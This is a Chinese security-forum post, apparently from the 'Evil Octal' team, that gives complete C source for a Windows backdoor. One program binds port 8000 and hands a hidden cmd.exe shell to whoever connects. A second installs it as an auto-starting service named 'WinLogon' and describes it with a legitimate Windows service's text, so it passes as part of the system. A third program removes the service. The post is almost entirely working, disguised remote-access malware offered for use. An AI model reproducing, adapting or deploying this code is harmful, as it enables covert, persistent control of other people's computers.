软件作者：pt007[at]vip.sina.com版权所有,转载请注明版权

信息来源：邪恶八进制信息安全团队（ ）

1、后门服务的代码:backforservice1.c

Copy code

/**/

/* 在本机开到服务端口8000,也可以换成其它的反弹型后门*/

#include 

<

winsock2.h

>

#include 

<

windows.h

>

#include 

<

stdio.h

>

//

预编译指令,下面是设置连接器link中的project options,连接器选项值请参考MSDN:

/**/

/*#pragma comment(linker,"/subsystem:windows /FILEALIGN:0x200 /ENTRY:main")//用来屏蔽控制台应用程序的窗口

#pragma comment(linker,"/IGNORE:4078")

#pragma comment(linker,"/MERGE:.idata=.text /MERGE:.data=.text /MERGE:.rdata=.text /MERGE:.text=DNA32r /SECTION:DNA32r,EWR")*/

#pragma comment(lib, 

"

ws2_32.lib

"

) 

//

链接到WS2_32.LIB库

#define

 MasterPort 8000 

//

连接端口

/**/

//

 Declare several global variables to share 

//

 their values across multiple functions of your program.

/**/

SERVICE_STATUS          ServiceStatus; 

SERVICE_STATUS_HANDLE  hStatus; 

/**/

//

 Make the forward definitions of functions prototypes.

//

/**/

void

  ServiceMain(

int

 argc, 

char

**

 argv); 

void

  ControlHandler(DWORD request);

void

 Entrypoint();

//

 Control Handler

void

 ControlHandler(DWORD request) 

{ 

  switch(request) 

  { 

      case SERVICE_CONTROL_STOP: 

        OutputDebugString("Monitoring stopped.");

          //printf("Monitoring stopped.\n");

        ServiceStatus.dwWin32ExitCode = 0; 

        ServiceStatus.dwCurrentState = SERVICE_STOPPED; 

        SetServiceStatus (hStatus, &ServiceStatus);

        return; 

      case SERVICE_CONTROL_SHUTDOWN: 

        OutputDebugString("Monitoring stopped.");

        //printf("Monitoring stopped.\n");

        ServiceStatus.dwWin32ExitCode = 0; 

        ServiceStatus.dwCurrentState = SERVICE_STOPPED; 

        SetServiceStatus (hStatus, &ServiceStatus);

        return; 

        

      default:

        break;

    } 

    // Report current status

    SetServiceStatus (hStatus, &ServiceStatus);

    return; 

}

void

 ServiceMain(

int

 argc, 

char

**

 argv) 

{ 

  ServiceStatus.dwServiceType =  SERVICE_WIN32; 

  ServiceStatus.dwCurrentState = SERVICE_START_PENDING; 

  ServiceStatus.dwControlsAccepted  = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_SHUTDOWN;

  ServiceStatus.dwWin32ExitCode = 0; 

  ServiceStatus.dwServiceSpecificExitCode = 0; 

  ServiceStatus.dwCheckPoint = 0; 

  ServiceStatus.dwWaitHint = 0; 

  hStatus = RegisterServiceCtrlHandler(

      "WinLogon", 

      (LPHANDLER_FUNCTION)ControlHandler); 

  if (hStatus == (SERVICE_STATUS_HANDLE)0) 

  { 

      // Registering Control Handler failed

      return; 

  }  

    

  // We report the running status to SCM. 

  ServiceStatus.dwCurrentState = SERVICE_RUNNING; 

  SetServiceStatus (hStatus, &ServiceStatus);

  Entrypoint();

  return; 

}

void

 Entrypoint()

{

WSADATA WSADa;

SOCKADDR_IN SockAddrIn;

SOCKET CSocket,SSocket;

int iAddrSize;

PROCESS_INFORMATION ProcessInfo; //进程结构信息,136页

STARTUPINFO StartupInfo; //核心编程第四章20页,高级编程63页

char szCMDPath[255];

//-------------------结构清0

ZeroMemory(&ProcessInfo, sizeof(PROCESS_INFORMATION));

ZeroMemory(&StartupInfo, sizeof(STARTUPINFO));

ZeroMemory(&WSADa, sizeof(WSADATA));

//----初始化数据----

//获取cmd路径:

GetEnvironmentVariable("COMSPEC",szCMDPath,sizeof(szCMDPath));//143页

//加载ws2_32.dll,初使化winsock版本2.2:

WSAStartup(0x0202,&WSADa);//即WSAStartup(MAKEWORD(2,2),&wsaData);

//设置本地信息和绑定协议:

SockAddrIn.sin_family = AF_INET; //表示IPv4地址族

SockAddrIn.sin_addr.s_addr = INADDR_ANY; //表示任意地址

SockAddrIn.sin_port = htons(MasterPort); //端口号

CSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0); //创建一个套接字

//绑定端口:

bind(CSocket,(SOCKADDR *)&SockAddrIn,sizeof(SockAddrIn));

listen(CSocket,1);

iAddrSize = sizeof(SockAddrIn);

SSocket = accept(CSocket,(SOCKADDR *)&SockAddrIn,&iAddrSize);//返回一个已连接套接字SSocket

//开始连接远程服务器:

StartupInfo.cb = sizeof(STARTUPINFO);

StartupInfo.wShowWindow = SW_HIDE;//表示隐藏窗口

StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;

//控制台输入与输出句柄指向已连接套接字SSocket:

StartupInfo.hStdInput = (HANDLE)SSocket;

StartupInfo.hStdOutput = (HANDLE)SSocket;

StartupInfo.hStdError = (HANDLE)SSocket;

//创建匿名管道:

CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &StartupInfo, &ProcessInfo);

WaitForSingleObject(ProcessInfo.hProcess, INFINITE);//142页,函数准备等待到hProcess句柄标识的进程终止运行为止

CloseHandle(ProcessInfo.hProcess);//关闭进程和线程句柄

CloseHandle(ProcessInfo.hThread);

closesocket(CSocket);//关闭这些套接字

closesocket(SSocket);

WSACleanup();//让Winsock释放所有分配的资源，并取消此应用程序挂起的Winsock调用

//关闭连接卸载ws2_32.dll

return;

}

void

 main(

int

 argc, 

char

*

 argv[])

{ 

  SERVICE_TABLE_ENTRY ServiceTable[2];

  ServiceTable[0].lpServiceName = "WinLogon";

  ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;

  ServiceTable[1].lpServiceName = NULL;

  ServiceTable[1].lpServiceProc = NULL;

  // Start the control dispatcher thread for our service

  StartServiceCtrlDispatcher(ServiceTable);

}

2、下面是创建服务的代码:services2.c

Copy code

#include 

<

windows.h

>

#include 

<

stdio.h

>

int

 main(

void

)

{

    char* buff;

    SC_HANDLE  hSCManager,hService;

    DWORD hEorr;

    LPVOID Info;

    Info="为用户和服务身份验证维护此计算机和域控制器之间的安全通道。";

    //buff="c:\\Program Files\\Microsoft Visual Studio\\MyProjects\\service\\MemoryStatus\\Debug\\MemoryStatus.exe";

    buff="C:\\Program Files\\Microsoft Visual Studio\\MyProjects\\service\\Debug\\backforservice1.exe";

//第一步是打开SCM,获取句柄然后允许创建服务:

    hSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);//SC_MANAGER_CREATE_SERVICE);

    if (hSCManager == NULL)

    {

        hEorr =GetLastError(); 

        printf("Open SCManager false..\n",hEorr);

        exit(0);

    }

//第二步是创建服务:

    hService = CreateService(hSCManager,"WinLogon","WinLogon",SERVICE_ALL_ACCESS, SERVICE_WIN32_SHARE_PROCESS,SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,buff, NULL, NULL, NULL, NULL, NULL);//SERVICE_START+DELETE

    if (hService!=NULL) 

    {    printf("Create service success!\n");

          ChangeServiceConfig2(hService,SERVICE_CONFIG_DESCRIPTION,&Info);

          //第三步是启动服务:    

            StartService(hService,0,NULL);

            

        }

    else 

    {printf("Create service error!\n");

    }

    CloseServiceHandle(hSCManager);//关闭服务句柄

    CloseServiceHandle(hService);

return 0;

}

3、下面是删除服务的代码：deleteservice.c

Copy code

#include 

<

windows.h

>

#include 

<

stdio.h

>

int

 main(

void

)

{

    SC_HANDLE  hSCManager,hService;

    DWORD hEorr;

        

//第一步是打开SCM,获取句柄然后允许打开服务:

    hSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);//SC_MANAGER_CREATE_SERVICE);

    if (hSCManager == NULL)

    {

        hEorr =GetLastError(); 

        printf("Open SCManager false..\n",hEorr);

        exit(0);

    }

//第二步是打开服务:

    hService = OpenService(hSCManager,"WinLogon",SERVICE_ALL_ACCESS);

    if (hService!=NULL) 

        {

          //第三步是删除指定服务:    

          if(DeleteService(hService))

              printf("Delete service success!\n");

                  }

    else 

    {printf("Delete service error!\n");

    }

    CloseServiceHandle(hSCManager);//关闭服务句柄

        CloseServiceHandle(hService);

  return 0;

}